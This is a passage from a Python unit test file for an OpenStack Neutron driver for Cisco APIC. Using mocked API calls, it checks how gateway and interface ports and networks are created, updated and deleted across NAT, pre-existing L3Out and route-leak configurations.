expected_calls = [
mock.call(leak_l3out, subnet='5.5.5.0/24',
external_epg=leak_ext_epg,
owner=bd_tenant, transaction=mock.ANY),
mock.call(leak_l3out1, subnet='5.5.5.0/24',
external_epg=leak_ext_epg,
owner=bd_tenant, transaction=mock.ANY)]
self._check_call_list(
expected_calls,
mgr.ensure_external_epg_created.call_args_list)
mgr.set_l3out_for_bd.assert_called_once_with(
bd_tenant, bd_name, l3out_name,
transaction=mock.ANY)
def test_update_edge_nat_interface_port_postcommit(self):
self._test_update_interface_port_postcommit()
def test_update_route_leak_edge_nat_interface_port_postcommit(self):
self._test_update_interface_port_postcommit(route_leak=True)
def test_update_cross_tenant_edge_nat_interface_port_postcommit(self):
self._test_update_interface_port_postcommit('another')
def test_update_route_leak_cross_tenant_edge_nat_interface_port_postcommit(
self):
self._test_update_interface_port_postcommit('another', route_leak=True)
def test_update_no_nat_interface_port_postcommit(self):
self._test_update_interface_port_postcommit(no_nat=True)
def test_update_cross_tenant_no_nat_interface_port_postcommit(self):
self._test_update_interface_port_postcommit(no_nat=True,
net_tenant='another')
def test_update_pre_no_nat_interface_port_postcommit(self):
self._test_update_interface_port_postcommit(no_nat=True, pre=True)
def test_update_cross_tenant_pre_no_nat_interface_port_postcommit(self):
self._test_update_interface_port_postcommit(
no_nat=True, pre=True, net_tenant='another')
def _test_update_pre_edge_nat_gw_port_postcommit(
self, net_tenant=mocked.APIC_TENANT):
net_ctx = self._get_network_context(net_tenant,
mocked.APIC_NETWORK_PRE_EDGE_NAT,
TEST_SEGMENT1, external=True)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE_EDGE_NAT,
'vm1', net_ctx, HOST_ID1, gw=True)
mgr = self.driver.apic_manager
mgr.get_router_contract.return_value = mocked.FakeDbContract(
mocked.APIC_CONTRACT)
self.driver.l3out_vlan_alloc.reserve_vlan = mock.Mock()
self.driver._query_l3out_info = mock.Mock()
self.driver._query_l3out_info.return_value = {
'l3out_tenant': 'bar_tenant',
'vrf_name': 'bar_ctx',
'vrf_tenant': 'bar_tenant',
# fake l3out response from APIC for testing purpose only
'l3out': ([{u'l3extExtEncapAllocator': {}},
{u'l3extInstP': {}},
{u'l3extRtBDToOut': {}},
{u'l3extRsOutToBDPublicSubnetHolder': {}},
{u'l3extRsNdIfPol': {u'tDn': u'',
u'tnNdIfPolName': u''}},
{u'l3extRsDampeningPol':
{u'tDn': u'', u'tnRtctrlProfileName': u''}},
{u'ospfRsIfPol': {u'tDn': u'',
u'tnOspfIfPolName': u''}},
{u'l3extRsEngressQosDppPol':
{u'tDn': u'', u'tnQosDppPolName': u''}},
{u'bfdRsIfPol': {u'tDn': u'',
u'tnBfdIfPolName': u''}},
{u'bgpRsPeerPfxPol': {u'tDn': u'',
u'tnBgpPeerPfxPolName': u''}},
{u'eigrpRsIfPol': {u'tDn': u'',
u'tnEigrpIfPolName': u''}},
{u'l3extLNodeP': {u'attributes':
{u'dn': u'uni/tn-bar_tenant/out-netwo\
rk_pre_edge_nat-name/lnodep-Leaf3-4_NP',
u'lcOwn': u'local',
u'name': u'Leaf3-4_NP',
u'targetDscp': u'unspecified',
u'configIssues': u'',
u'stateQual': u'', u'tCl': u'',
u'tContextDn': u'', u'tRn': u'',
u'type': u'', u'rType': u'',
u'state': u'', u'forceResolve': u'',
u'tag': u'yellow-green',
u'monPolDn': u'', u'modTs': u'',
u'uid': u'15374',
u'encap': u'unknown',
u'addr': u'0.0.0.0'},
u'children': [{u'l3extLIfP':
{u'children':
[{u'l3extRsPathL3OutA\
tt':
{u'attributes':
{u'encap':
u'vlan-3101',
u'ifInstT':
u'sub-interface'
}}}]}}
]}},
{u'l3extRsEctx':
{u'attributes':
{u'dn':
u'uni/tn-bar_tenant/out-network_pre_edge_nat-name\
/rsectx',
u'tDn': u'', u'tnFvCtxName': u'default'}}}])}
def echo1(obj):
return str(obj)
self.driver.apic_manager.apic.fvTenant.rn = echo1
self.driver.apic_manager.apic.l3extOut.rn = echo1
self.driver.apic_manager.apic.fvCtx.name = echo1
self.driver.l3out_vlan_alloc.reserve_vlan.return_value = 999
manager.NeutronManager = mock.MagicMock()
manager.NeutronManager.get_plugin().get_networks.return_value = [
{'tenant_id': mocked.APIC_TENANT,
'name': mocked.APIC_NETWORK,
'id': u'net_id'}]
self.driver.update_port_postcommit(port_ctx)
mgr.get_router_contract.assert_called_once_with(
self._scoped_name(port_ctx.current['device_id']),
owner=self._router_tenant())
self.driver.l3out_vlan_alloc.reserve_vlan.assert_called_once_with(
mocked.APIC_NETWORK_PRE_EDGE_NAT + '-name',
self._routed_network_vrf_name(), self._tenant(ext_nat=True))
self.assertFalse(mgr.mgr.ensure_external_routed_network_created.called)
self.assertFalse(mgr.set_domain_for_external_routed_network.called)
self.assertFalse(mgr.ensure_logical_node_profile_created.called)
self.assertFalse(mgr.ensure_static_route_created.called)
vrf_pfx = ('%s-' % mocked.APIC_ROUTER
if self.driver.vrf_per_router_tenants else '')
l3out_name = (self.driver.per_tenant_context and
self._scoped_name(vrf_pfx +
mocked.APIC_NETWORK_PRE_EDGE_NAT) or
mocked.APIC_NETWORK_PRE_EDGE_NAT)
l3out_name = "Auto-%s" % l3out_name
final_req = re.sub('Auto-Sub',
l3out_name, self.trimmed_l3out)
final_req = re.sub('tn-Sub',
"tn-%s" % self._tenant(ext_nat=True), final_req)
final_req = re.sub('ctx-Sub',
"%s" % self._routed_network_vrf_name(), final_req)
mgr.apic.post_body.assert_called_once_with(
mgr.apic.l3extOut.mo, final_req, self._tenant(ext_nat=True),
l3out_name)
expected_calls = [
mock.call(
l3out_name, subnet='5.5.5.0/24',
external_epg="Auto-%s" % self._scoped_name(
mocked.APIC_EXT_EPG, preexisting=True),
owner=self._tenant(ext_nat=True), transaction=mock.ANY),
mock.call(
l3out_name, subnet='6.6.6.0/24',
external_epg="Auto-%s" % self._scoped_name(
mocked.APIC_EXT_EPG, preexisting=True),
owner=self._tenant(ext_nat=True), transaction=mock.ANY)]
self._check_call_list(
expected_calls, mgr.ensure_external_epg_created.call_args_list)
mgr.set_l3out_for_bd.assert_called_once_with(
self._tenant(), self._scoped_name('net_id'), l3out_name,
transaction=mock.ANY)
expected_calls = [
mock.call(
l3out_name,
mgr.get_router_contract.return_value,
external_epg="Auto-%s" % self._scoped_name(mocked.APIC_EXT_EPG,
preexisting=True),
owner=self._tenant(ext_nat=True), transaction=mock.ANY)]
self._check_call_list(
expected_calls,
mgr.ensure_external_epg_consumed_contract.call_args_list)
expected_calls = [
mock.call(
l3out_name,
mgr.get_router_contract.return_value,
external_epg="Auto-%s" % self._scoped_name(mocked.APIC_EXT_EPG,
preexisting=True),
owner=self._tenant(ext_nat=True), transaction=mock.ANY)]
self._check_call_list(
expected_calls,
mgr.ensure_external_epg_provided_contract.call_args_list)
def test_update_pre_edge_nat_gw_port_postcommit(self):
self._test_update_pre_edge_nat_gw_port_postcommit()
def test_update_cross_tenant_pre_edge_nat_gw_port_postcommit(self):
self._test_update_pre_edge_nat_gw_port_postcommit('admin_tenant')
def _test_update_pre_gw_port_postcommit(self,
net_tenant=mocked.APIC_TENANT):
net_ctx = self._get_network_context(net_tenant,
mocked.APIC_NETWORK_PRE,
TEST_SEGMENT1, external=True)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE,
'vm1', net_ctx, HOST_ID1, gw=True)
mgr = self.driver.apic_manager
mgr.get_router_contract.return_value = mocked.FakeDbContract(
mocked.APIC_CONTRACT)
self.driver._query_l3out_info = mock.Mock()
self.driver._query_l3out_info.return_value = {
'l3out_tenant': 'bar_tenant',
'vrf_name': 'bar_ctx',
'vrf_tenant': 'bar_tenant'}
self.driver.update_port_postcommit(port_ctx)
mgr.get_router_contract.assert_called_once_with(
self._scoped_name(port_ctx.current['device_id']),
owner=self._router_tenant())
vrf_pfx = ('%s-' % mocked.APIC_ROUTER
if self.driver.vrf_per_router_tenants else '')
shd_l3out = (self.driver.per_tenant_context and
self._scoped_name(vrf_pfx + mocked.APIC_NETWORK_PRE) or
mocked.APIC_NETWORK_PRE)
expected_calls = [
mock.call("Shd-%s" % shd_l3out,
owner=self._tenant(ext_nat=True), transaction=mock.ANY,
context=self._routed_network_vrf_name())]
self._check_call_list(
expected_calls,
mgr.ensure_external_routed_network_created.call_args_list)
self.assertFalse(mgr.set_domain_for_external_routed_network.called)
self.assertFalse(mgr.ensure_logical_node_profile_created.called)
self.assertFalse(mgr.ensure_static_route_created.called)
expected_calls = [
mock.call(
"Shd-%s" % shd_l3out, subnet='5.5.5.0/24',
external_epg="Shd-%s" % self._scoped_name(
mocked.APIC_EXT_EPG, preexisting=True),
owner=self._tenant(ext_nat=True), transaction=mock.ANY),
mock.call(
"Shd-%s" % shd_l3out, subnet='6.6.6.0/24',
external_epg="Shd-%s" % self._scoped_name(
mocked.APIC_EXT_EPG, preexisting=True),
owner=self._tenant(ext_nat=True), transaction=mock.ANY)]
self._check_call_list(
expected_calls, mgr.ensure_external_epg_created.call_args_list)
expected_calls = [
mock.call(
"Shd-%s" % shd_l3out,
mgr.get_router_contract.return_value,
external_epg="Shd-%s" % self._scoped_name(mocked.APIC_EXT_EPG,
preexisting=True),
owner=self._tenant(ext_nat=True), transaction=mock.ANY)]
self._check_call_list(
expected_calls,
mgr.ensure_external_epg_consumed_contract.call_args_list)
expected_calls = [
mock.call(
"Shd-%s" % shd_l3out,
mgr.get_router_contract.return_value,
external_epg="Shd-%s" % self._scoped_name(mocked.APIC_EXT_EPG,
preexisting=True),
owner=self._tenant(ext_nat=True), transaction=mock.ANY)]
self._check_call_list(
expected_calls,
mgr.ensure_external_epg_provided_contract.call_args_list)
def test_update_pre_gw_port_postcommit(self):
self._test_update_pre_gw_port_postcommit()
def test_update_cross_tenant_pre_gw_port_postcommit(self):
self._test_update_pre_gw_port_postcommit('admin_tenant')
def _test_update_pre_no_nat_gw_port_postcommit(self, l3out_tenant):
self.external_network_dict[mocked.APIC_NETWORK_PRE + '-name'][
'enable_nat'] = 'False'
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE,
TEST_SEGMENT1, external=True)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE,
'vm1', net_ctx, HOST_ID1, gw=True)
mgr = self.driver.apic_manager
mgr.get_router_contract.return_value = mocked.FakeDbContract(
mocked.APIC_CONTRACT)
ctx_name = self._network_vrf_name(
nat_vrf=False, net_name=self._scoped_name(net_ctx.current['id']))
self.driver._query_l3out_info = mock.Mock()
self.driver._query_l3out_info.return_value = {
'l3out_tenant': l3out_tenant,
'vrf_name': ctx_name,
'vrf_tenant': self._tenant(vrf=True)}
nets = [
{'tenant_id': mocked.APIC_TENANT + '1',
'name': mocked.APIC_NETWORK,
'id': 'net_id1'},
{'tenant_id': mocked.APIC_TENANT + '2',
'name': mocked.APIC_NETWORK,
'id': 'net_id2'}]
manager.NeutronManager = mock.MagicMock()
manager.NeutronManager.get_plugin().get_networks.return_value = nets
self.driver.update_port_postcommit(port_ctx)
mgr.get_router_contract.assert_called_once_with(
self._scoped_name(port_ctx.current['device_id']),
owner=self._router_tenant())
self.assertFalse(mgr.ensure_external_routed_network_created.called)
self.assertFalse(mgr.ensure_external_epg_created.called)
l3out_name = self._scoped_name(net_ctx.current['name'],
preexisting=True)
mgr.set_context_for_external_routed_network.assert_called_once_with(
l3out_tenant, l3out_name, self._routed_network_vrf_name(),
transaction=mock.ANY)
expected_calls = [
mock.call(
l3out_name,
mgr.get_router_contract.return_value,
external_epg=self._scoped_name(mocked.APIC_EXT_EPG,
preexisting=True),
owner=l3out_tenant, transaction=mock.ANY)]
self._check_call_list(
expected_calls,
mgr.ensure_external_epg_consumed_contract.call_args_list)
expected_calls = [
mock.call(
l3out_name, mgr.get_router_contract.return_value,
external_epg=self._scoped_name(mocked.APIC_EXT_EPG,
preexisting=True),
owner=l3out_tenant, transaction=mock.ANY)]
self._check_call_list(
expected_calls,
mgr.ensure_external_epg_provided_contract.call_args_list)
self.assertFalse(mgr.set_contract_for_epg.called)
expected_l3out_bd_calls = [
mock.call(self._tenant(neutron_tenant=n['tenant_id']),
self._scoped_name(n['id'], tenant=n['tenant_id']),
l3out_name,
transaction=mock.ANY)
for n in nets]
self._check_call_list(expected_l3out_bd_calls,
mgr.set_l3out_for_bd.call_args_list)
def test_update_pre_no_nat_gw_port_postcommit_tenant(self):
self._test_update_pre_no_nat_gw_port_postcommit(self._tenant())
def test_update_pre_no_nat_gw_port_postcommit_common(self):
self._test_update_pre_no_nat_gw_port_postcommit('common')
def test_delete_gw_port_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1, external=True)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
'vm1', net_ctx, HOST_ID1, gw=True)
self.driver._delete_path_if_last = mock.Mock()
self.driver.delete_port_postcommit(port_ctx)
mgr = self.driver.apic_manager
vrf_pfx = ('%s-' % mocked.APIC_ROUTER
if self.driver.vrf_per_router_tenants else '')
mgr.delete_external_routed_network.assert_called_once_with(
"Shd-%s" % (self.driver.per_tenant_context and
self._scoped_name(vrf_pfx + mocked.APIC_NETWORK) or
mocked.APIC_NETWORK),
owner=self._tenant(ext_nat=True))
def test_delete_gw_port_postcommit_empty_tenant(self):
self.driver._l3_plugin.get_router = mock.Mock(
return_value={'id': mocked.APIC_ROUTER, 'tenant_id': ''})
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1, external=True)
r_cnst = n_constants.DEVICE_OWNER_ROUTER_GW
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
mocked.APIC_ROUTER,
net_ctx, HOST_ID1, gw=True,
device_owner=r_cnst)
self.driver.delete_port_postcommit(port_ctx)
mgr = self.driver.apic_manager
mgr.delete_external_routed_network.assert_not_called()
def test_delete_edge_nat_gw_port_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_EDGE_NAT,
TEST_SEGMENT1, external=True)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_EDGE_NAT,
'vm1', net_ctx, HOST_ID1, gw=True)
self.driver._delete_path_if_last = mock.Mock()
self.driver.l3out_vlan_alloc.release_vlan = mock.Mock()
manager.NeutronManager = mock.MagicMock()
manager.NeutronManager.get_plugin().get_networks.return_value = [
{'tenant_id': mocked.APIC_TENANT,
'name': mocked.APIC_NETWORK,
'id': 'net_id'}]
self.driver.delete_port_postcommit(port_ctx)
mgr = self.driver.apic_manager
vrf_pfx = ('%s-' % mocked.APIC_ROUTER
if self.driver.vrf_per_router_tenants else '')
l3out_name = (self.driver.per_tenant_context and
self._scoped_name(vrf_pfx + mocked.APIC_NETWORK_EDGE_NAT)
or mocked.APIC_NETWORK_EDGE_NAT)
l3out_name = "Auto-%s" % l3out_name
mgr.delete_external_routed_network.assert_called_once_with(
l3out_name, owner=self._tenant(ext_nat=True))
self.driver.l3out_vlan_alloc.release_vlan.assert_called_once_with(
mocked.APIC_NETWORK_EDGE_NAT + '-name',
self._routed_network_vrf_name(),
self._tenant(ext_nat=True))
bd_name = self._scoped_name('net_id')
mgr.unset_l3out_for_bd.assert_called_once_with(
self._tenant(), bd_name, l3out_name, transaction=mock.ANY)
def test_delete_pre_edge_nat_gw_port_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE_EDGE_NAT,
TEST_SEGMENT1, external=True)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE_EDGE_NAT,
'vm1', net_ctx, HOST_ID1, gw=True)
self.driver._delete_path_if_last = mock.Mock()
self.driver.l3out_vlan_alloc.release_vlan = mock.Mock()
manager.NeutronManager = mock.MagicMock()
manager.NeutronManager.get_plugin().get_networks.return_value = [
{'tenant_id': mocked.APIC_TENANT,
'name': mocked.APIC_NETWORK,
'id': 'net_id'}]
self.driver.delete_port_postcommit(port_ctx)
mgr = self.driver.apic_manager
vrf_pfx = ('%s-' % mocked.APIC_ROUTER
if self.driver.vrf_per_router_tenants else '')
l3out_name = (self.driver.per_tenant_context and
self._scoped_name(vrf_pfx +
mocked.APIC_NETWORK_PRE_EDGE_NAT) or
mocked.APIC_NETWORK_PRE_EDGE_NAT)
l3out_name = "Auto-%s" % l3out_name
mgr.delete_external_routed_network.assert_called_once_with(
l3out_name, owner=self._tenant(ext_nat=True))
self.driver.l3out_vlan_alloc.release_vlan.assert_called_once_with(
mocked.APIC_NETWORK_PRE_EDGE_NAT + '-name',
self._routed_network_vrf_name(), self._tenant(ext_nat=True))
bd_name = self._scoped_name('net_id')
mgr.unset_l3out_for_bd.assert_called_once_with(
self._tenant(), bd_name, l3out_name, transaction=mock.ANY)
def _test_delete_interface_port_postcommit(self, route_leak=False):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
'net_id',
TEST_SEGMENT1,
route_leak=route_leak)
net_ctx1 = self._get_network_context(mocked.APIC_TENANT,
'net_id1',
TEST_SEGMENT1,
route_leak=route_leak)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
'net_id',
'vm1', net_ctx, HOST_ID1,
interface=True)
if route_leak:
self.driver._l3_plugin.get_router = mock.Mock(
return_value={'id': 'some_id',
'name': mocked.APIC_ROUTER + '-name',
'tenant_id': mocked.APIC_TENANT,
'apic:use_routing_context': mocked.APIC_ROUTER,
'external_gateway_info':
{'network_id': mocked.APIC_NETWORK_EDGE_NAT,
'external_fixed_ips': []}})
else:
self.driver._l3_plugin.get_router = mock.Mock(
return_value={'id': mocked.APIC_ROUTER,
'name': mocked.APIC_ROUTER + '-name',
'tenant_id': mocked.APIC_TENANT,
'external_gateway_info':
{'network_id': mocked.APIC_NETWORK_EDGE_NAT,
'external_fixed_ips': []}})
port_ctx._plugin.get_network = mock.Mock(
return_value={'name': mocked.APIC_NETWORK_EDGE_NAT + '-name',
'router:external': True})
self.driver._get_route_leak_networks = mock.Mock(
return_value=([net_ctx.current, net_ctx1.current]))
port_ctx._plugin.get_subnets = mock.Mock(
return_value=[{'tenant_id': mocked.APIC_TENANT,
'id': 'some_id',
'cidr': '5.5.5.0/24'}])
self.driver.delete_port_postcommit(port_ctx)
prefix = ('%s-' % mocked.APIC_ROUTER
if self.driver.vrf_per_router_tenants else '')
l3out_name = (self.driver.per_tenant_context and
self._scoped_name(prefix + mocked.APIC_NETWORK_EDGE_NAT)
or mocked.APIC_NETWORK_EDGE_NAT)
l3out_name = "Auto-%s" % l3out_name
bd_name = self._scoped_name('net_id')
mgr = self.driver.apic_manager
mgr.unset_l3out_for_bd.assert_called_once_with(
self._tenant(), bd_name, l3out_name, transaction=mock.ANY)
if self.driver.vrf_per_router_tenants:
leak_l3out = 'Leak-%s' % net_ctx.current['name']
leak_l3out1 = 'Leak-%s' % net_ctx1.current['name']
leak_ext_epg = 'Leak-%s-%s' % (mocked.APIC_ROUTER + '-name',
mocked.APIC_EXT_EPG)
if route_leak:
leak_epg_name = 'Leak-%s-%s' % (mocked.APIC_ROUTER, 'net_id')
mgr.delete_epg_for_network.assert_called_once_with(
self._tenant(), leak_epg_name,
app_profile_name=self._app_profile(),
transaction=mock.ANY)
leak_bd_name = 'Leak-%s-%s' % (mocked.APIC_ROUTER, bd_name)
mgr.delete_bd_on_apic.assert_called_once_with(
self._tenant(), leak_bd_name, transaction=mock.ANY)
mgr.ensure_external_epg_deleted.assert_called_once_with(
leak_l3out, external_epg=leak_ext_epg,
owner=self._tenant(), transaction=mock.ANY)
else:
expected_calls = [
mock.call(leak_l3out, subnets=['5.5.5.0/24'],
external_epg=leak_ext_epg,
owner=self._tenant(), transaction=mock.ANY),
mock.call(leak_l3out1, subnets=['5.5.5.0/24'],
external_epg=leak_ext_epg,
owner=self._tenant(), transaction=mock.ANY)]
self._check_call_list(
expected_calls,
mgr.ensure_external_epg_routes_deleted.call_args_list)
mgr.ensure_context_deleted(
owner=self._tenant(),
ctx_id=self._routed_network_vrf_name(),
transaction=mock.ANY)
mgr.set_context_for_bd.assert_called_once_with(
self._tenant(), bd_name, self._network_vrf_name(),
transaction=mock.ANY)
def test_delete_edge_nat_interface_port_postcommit(self):
self._test_delete_interface_port_postcommit()
def test_delete_route_leak_edge_nat_interface_port_postcommit(self):
self._test_delete_interface_port_postcommit(route_leak=True)
def test_update_no_nat_gw_port_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_NO_NAT,
TEST_SEGMENT1, external=True)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_NO_NAT,
'vm1', net_ctx, HOST_ID1, gw=True)
mgr = self.driver.apic_manager
mgr.get_router_contract.return_value = mocked.FakeDbContract(
mocked.APIC_CONTRACT)
nets = [
{'tenant_id': mocked.APIC_TENANT + '1',
'name': mocked.APIC_NETWORK,
'id': 'net_id1'},
{'tenant_id': mocked.APIC_TENANT + '2',
'name': mocked.APIC_NETWORK,
'id': 'net_id2'}]
manager.NeutronManager = mock.MagicMock()
manager.NeutronManager.get_plugin().get_networks.return_value = nets
self.driver.update_port_postcommit(port_ctx)
l3out_name = self._scoped_name(mocked.APIC_NETWORK_NO_NAT)
mgr.get_router_contract.assert_called_once_with(
self._scoped_name(port_ctx.current['device_id']),
owner=self._router_tenant())
mgr.set_context_for_external_routed_network.assert_called_once_with(
self._tenant(), l3out_name,
self._routed_network_vrf_name(),
transaction=mock.ANY)
mgr.ensure_external_epg_consumed_contract.assert_called_once_with(
l3out_name,
mgr.get_router_contract.return_value,
external_epg=mocked.APIC_EXT_EPG, transaction=mock.ANY,
owner=self._tenant())
mgr.ensure_external_epg_provided_contract.assert_called_once_with(
l3out_name,
mgr.get_router_contract.return_value,
external_epg=mocked.APIC_EXT_EPG, transaction=mock.ANY,
owner=self._tenant())
self.assertFalse(mgr.set_contract_for_epg.called)
expected_l3out_bd_calls = [
mock.call(self._tenant(neutron_tenant=n['tenant_id']),
self._scoped_name(n['id'], tenant=n['tenant_id']),
l3out_name,
transaction=mock.ANY)
for n in nets]
self._check_call_list(expected_l3out_bd_calls,
mgr.set_l3out_for_bd.call_args_list)
def test_delete_unrelated_gw_port_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
'unrelated',
TEST_SEGMENT1, external=True)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
'unrelated',
'vm1', net_ctx, HOST_ID1, gw=True)
self.driver._delete_path_if_last = mock.Mock()
self.driver.delete_port_postcommit(port_ctx)
mgr = self.driver.apic_manager
self.assertFalse(mgr.delete_external_epg_contract.called)
def test_delete_pre_gw_port_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE,
TEST_SEGMENT1, external=True)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE,
'vm1', net_ctx, HOST_ID1, gw=True)
mgr = self.driver.apic_manager
self.driver._delete_path_if_last = mock.Mock()
self.driver._query_l3out_info = mock.Mock()
self.driver._query_l3out_info.return_value = {
'l3out_tenant': 'bar_tenant'}
self.driver.delete_port_postcommit(port_ctx)
vrf_pfx = ('%s-' % mocked.APIC_ROUTER
if self.driver.vrf_per_router_tenants else '')
mgr.delete_external_routed_network.assert_called_once_with(
"Shd-%s" % (self.driver.per_tenant_context and
self._scoped_name(vrf_pfx + mocked.APIC_NETWORK_PRE) or
mocked.APIC_NETWORK_PRE),
owner=self._tenant(ext_nat=True))
def _test_delete_no_nat_gw_port_postcommit(self, pre):
if pre:
self.external_network_dict[mocked.APIC_NETWORK_NO_NAT + '-name'][
'preexisting'] = 'True'
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_NO_NAT,
TEST_SEGMENT1, external=True)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_NO_NAT,
'vm1', net_ctx, HOST_ID1, gw=True)
self.driver._delete_path_if_last = mock.Mock()
mgr = self.driver.apic_manager
mgr.get_router_contract.return_value = mocked.FakeDbContract(
mocked.APIC_CONTRACT)
if pre:
self.driver._query_l3out_info = mock.Mock()
self.driver._query_l3out_info.return_value = {
'l3out_tenant': self._tenant(),
'vrf_name': self._network_vrf_name(),
'vrf_tenant': self._tenant(vrf=True)}
nets = [
{'tenant_id': mocked.APIC_TENANT + '1',
'name': mocked.APIC_NETWORK,
'id': 'net_id1'},
{'tenant_id': mocked.APIC_TENANT + '2',
'name': mocked.APIC_NETWORK,
'id': 'net_id2'}]
manager.NeutronManager = mock.MagicMock()
manager.NeutronManager.get_plugin().get_networks.return_value = nets
self.driver.delete_port_postcommit(port_ctx)
if pre:
l3out_name = self._scoped_name(net_ctx.current['name'],
preexisting=True)
else:
l3out_name = self._scoped_name(mocked.APIC_NETWORK_NO_NAT)
mgr.set_context_for_external_routed_network.assert_called_once_with(
self._tenant(), l3out_name, None, transaction=mock.ANY)
if pre:
expected_calls = [
mock.call(
l3out_name,
'contract-%s' % mocked.APIC_ROUTER,
external_epg=mocked.APIC_EXT_EPG, owner=self._tenant(),
provided=True, transaction=mock.ANY),
mock.call(
l3out_name,
'contract-%s' % mocked.APIC_ROUTER,
external_epg=mocked.APIC_EXT_EPG, owner=self._tenant(),
provided=False, transaction=mock.ANY)]
self._check_call_list(
expected_calls,
mgr.unset_contract_for_external_epg.call_args_list)
else:
mgr.delete_external_epg_contract.assert_called_once_with(
self._scoped_name(mocked.APIC_ROUTER),
l3out_name,
transaction=mock.ANY)
self.assertFalse(mgr.delete_external_routed_network.called)
expected_l3out_bd_calls = [
mock.call(self._tenant(neutron_tenant=n['tenant_id']),
self._scoped_name(n['id'], tenant=n['tenant_id']),
l3out_name,
transaction=mock.ANY)
for n in nets]
self._check_call_list(expected_l3out_bd_calls,
mgr.unset_l3out_for_bd.call_args_list)
def test_delete_no_nat_gw_port_postcommit(self):
self._test_delete_no_nat_gw_port_postcommit(False)
def test_delete_no_nat_pre_gw_port_postcommit(self):
self._test_delete_no_nat_gw_port_postcommit(True)
def test_create_network_postcommit(self):
ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1)
mgr = self.driver.apic_manager
self.driver.create_network_postcommit(ctx)
mgr.ensure_bd_created_on_apic.assert_called_once_with(
self._tenant(), self._scoped_name(mocked.APIC_NETWORK),
ctx_owner=self._tenant(vrf=True),
ctx_name=self._network_vrf_name(net_name=ctx.current['id']),
transaction='transaction', unicast_route=True)
mgr.ensure_epg_created.assert_called_once_with(
self._tenant(), mocked.APIC_NETWORK, transaction='transaction',
app_profile_name=self._app_profile(),
bd_name=self._scoped_name(mocked.APIC_NETWORK))
expected_calls = [
mock.call(mgr.apic.fvBD, self._tenant(),
self._scoped_name(mocked.APIC_NETWORK),
nameAlias=mocked.APIC_NETWORK + '-name'),
mock.call(mgr.apic.fvAEPg, self._tenant(), self._app_profile(),
mocked.APIC_NETWORK,
nameAlias=mocked.APIC_NETWORK + '-name')]
if self.driver.single_tenant_mode:
expected_calls.append(mock.call(mgr.apic.fvAp, self._tenant(),
self._app_profile(),
nameAlias=mocked.APIC_TENANT))
else:
expected_calls.append(mock.call(mgr.apic.fvTenant, self._tenant(),
nameAlias=mocked.APIC_TENANT))
self._check_call_list(expected_calls,
mgr.update_name_alias.call_args_list)
def test_create_route_leak_network_postcommit(self):
ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1,
route_leak=True)
mgr = self.driver.apic_manager
self.driver.create_network_postcommit(ctx)
mgr.ensure_bd_created_on_apic.assert_called_once_with(
self._tenant(), self._scoped_name(mocked.APIC_NETWORK),
ctx_owner=self._tenant(vrf=True),
ctx_name=self._network_vrf_name(net_name=ctx.current['id']),
transaction='transaction', unicast_route=True)
mgr.ensure_epg_created.assert_called_once_with(
self._tenant(), mocked.APIC_NETWORK, transaction='transaction',
app_profile_name=self._app_profile(),
bd_name=self._scoped_name(mocked.APIC_NETWORK))
if self.driver.vrf_per_router_tenants:
leak_l3out = "Leak-%s" % ctx.current['name']
mgr.ensure_external_routed_network_created.assert_called_once_with(
leak_l3out, owner=self._tenant(vrf=True),
context=self._network_vrf_name(net_name=ctx.current['id']),
transaction='transaction')
expected_calls = [
mock.call(mgr.apic.fvBD, self._tenant(),
self._scoped_name(mocked.APIC_NETWORK),
nameAlias=mocked.APIC_NETWORK + '-name'),
mock.call(mgr.apic.fvAEPg, self._tenant(), self._app_profile(),
mocked.APIC_NETWORK,
nameAlias=mocked.APIC_NETWORK + '-name')]
if self.driver.single_tenant_mode:
expected_calls.append(mock.call(mgr.apic.fvAp, self._tenant(),
self._app_profile(),
nameAlias=mocked.APIC_TENANT))
else:
expected_calls.append(mock.call(mgr.apic.fvTenant, self._tenant(),
nameAlias=mocked.APIC_TENANT))
self._check_call_list(expected_calls,
mgr.update_name_alias.call_args_list)
def test_update_network_postcommit(self):
ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1)
ctx.original = copy.copy(ctx.current)
mgr = self.driver.apic_manager
self.driver.update_network_postcommit(ctx)
self.assertFalse(mgr.apic.fvBD.update.called)
self.assertFalse(mgr.apic.fvAEPg.update.called)
# try again with a new network name
ctx.original['name'] = 'old_network_name'
self.driver.update_network_postcommit(ctx)
expected_calls = [
mock.call(mgr.apic.fvBD, self._tenant(),
self._scoped_name(mocked.APIC_NETWORK),
nameAlias=mocked.APIC_NETWORK + '-name'),
